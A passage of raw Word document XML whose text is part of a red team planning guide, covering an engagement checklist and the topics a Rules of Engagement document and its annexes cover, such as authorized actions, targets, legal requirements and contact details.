          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Draft observation and findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47305A9F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Finalize attack diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25116A2B" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>☐</w:t>
      </w:r>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> Finalize report</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B132A99" w14:textId="77777777" w:rsidR="00425372" w:rsidRPr="00B517C0" w:rsidRDefault="00425372" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6956035A" w14:textId="77777777" w:rsidR="00425372" w:rsidRDefault="00425372" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C75209B" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23CB7062" w14:textId="77777777" w:rsidR="00425372" w:rsidRPr="00B517C0" w:rsidRDefault="00425372" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43511566" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>RULES OF ENGAGEMENT (ROE) PLANNING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DCCC9" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>This document governs the entire process of a Red Team and must be adhered to during the execution of an engagement. Deviation from the rules established in the ROE must be approved by all parties prior to execution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185FE62" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The ROE document covers numerous topics. Some include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7CB464" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authorized Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37214269" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explicitly Restricted Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FD8712" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Authorized Targets and Target Space</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4633779C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Restricted Items (Blacklist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F806CBF" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Engagement Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD8A365" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ROE DOCUMENT</w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:anchor="roe-document" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00B517C0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5E012285" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The ROE documents the target information, approvals, threat implementation, activities, and issues required to staff, coordinate, and execute engagements within the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C96376F" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The main body of the ROE (often derived from a standing template) provides information on:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D98579" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The Red Team methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E25F62" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A high-level description of the types of activities that may be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>executed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6F71DFB5" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The types of hardware and software that may be </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>employed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7EA009ED" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A recommended deconfliction process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA9CDF2" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Levels of threat available (comparison)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E98B3" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Roles and responsibilities of each functional group (Exercise Control Group (ECG), White Cell, Training Audience (TA), etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5744F86C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>The identification of and references to appropriate legal requirements (PCI, FERPA, HIPAA, HITEC, SOX, GLBA, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFB2892" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>A legal responsibility disclaimer (federally mandated requirements for the Red Team to report certain findings)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D501AA4" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Information specific to each individual engagement should be documented in annexes to the ROE. At a minimum, ROE annexes should detail:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AE8DC" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>The Target of the Engagement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34640D40" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Organization name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D151B" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FFAA3C" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Specific groups or divisions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4932C2B2" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Organizational identifiers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B640D17" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B517C0">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Senior management contact info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085710D0" w14:textId="77777777" w:rsidR="00B517C0" w:rsidRPr="00B517C0" w:rsidRDefault="00B517C0" w:rsidP="00BB134D">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
